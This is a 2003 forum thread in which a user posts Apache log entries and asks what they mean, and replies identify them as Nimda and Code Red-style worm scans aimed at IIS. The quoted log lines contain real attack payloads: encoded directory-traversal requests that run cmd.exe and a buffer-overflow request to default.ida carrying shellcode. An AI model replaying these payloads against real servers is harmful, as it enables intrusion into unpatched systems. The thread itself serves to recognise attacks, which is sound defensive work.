Weird stuff in Apache log

Weird stuff in Apache log - Security - Windows & Software

Marsh Posted on 10-08-2003 at 17:02:41

Hello,

I noticed a few strange lines in my Apache logs (win32...).
What on earth is this?? Some little creep???:
 
 
81.130.173.187 - - [08/Aug/2003:15:51:35 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313  
81.130.173.187 - - [08/Aug/2003:15:51:36 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311  
81.130.173.187 - - [08/Aug/2003:15:51:40 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321  
81.130.173.187 - - [08/Aug/2003:15:51:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321  
81.130.173.187 - - [08/Aug/2003:15:51:41 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335  
81.130.173.187 - - [08/Aug/2003:15:51:42 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352  
81.56.162.211 - - [08/Aug/2003:19:36:24 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 308  
213.228.21.109 - - [08/Aug/2003:21:18:27 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313  
213.228.21.109 - - [08/Aug/2003:21:18:35 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311  
81.77.156.220 - - [08/Aug/2003:22:35:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 308  
81.248.119.178 - - [08/Aug/2003:23:20:02 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 308  
81.10.4.53 - - [09/Aug/2003:09:53:45 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 200 -  
81.56.192.20 - - [09/Aug/2003:11:05:34 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313  
81.56.192.20 - - [09/Aug/2003:11:05:43 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311  
81.56.192.20 - - [09/Aug/2003:11:05:52 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321  
81.56.192.20 - - [09/Aug/2003:11:06:02 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321  
81.56.192.20 - - [09/Aug/2003:11:06:11 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335  
81.56.192.20 - - [09/Aug/2003:11:06:21 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352  
81.56.192.20 - - [09/Aug/2003:11:06:31 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352  
81.56.192.20 - - [09/Aug/2003:11:06:40 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 368  
81.56.192.20 - - [09/Aug/2003:11:06:50 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334  
81.56.192.20 - - [09/Aug/2003:11:07:00 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334  
81.56.192.20 - - [09/Aug/2003:11:07:10 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334  
81.56.192.20 - - [09/Aug/2003:11:07:19 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334  
81.56.192.20 - - [09/Aug/2003:11:07:29 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318  
81.56.192.20 - - [09/Aug/2003:11:07:39 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318  
81.56.192.20 - - [09/Aug/2003:11:07:48 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335  
81.56.192.20 - - [09/Aug/2003:11:07:59 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335  
 
 
So, is it serious, doctor?


---------------
Unearther of mysterious mystical mysteries! Down with mosquitoes! :: Jeey - MMVII ::

Marsh Posted on 10-08-2003 at 18:38:52

No, it's just an infected IIS server (yet another sh!#$$* admin).


Marsh Posted on 10-08-2003 at 18:58:03

It's a worm that is supposed to attack IIS. You're not at risk.
I get 10-15 of these a day.


Marsh Posted on 10-08-2003 at 18:59:40

If anything, do a "net send 81.130.173.187 whatever text you want" to tell the guy his server is infected and it's about time he updated it.


Marsh Posted on 10-08-2003 at 20:16:42

Great, thank you!
I was a bit worried it might actually get somewhere!



Marsh Posted on 10-08-2003 at 20:18:36

It's a simple virus that goes by the sweet name of Nimda.

This virus is as old as the hills, but you don't change a winning team, i.e. users who still won't make the effort to put an antivirus on their Windows.
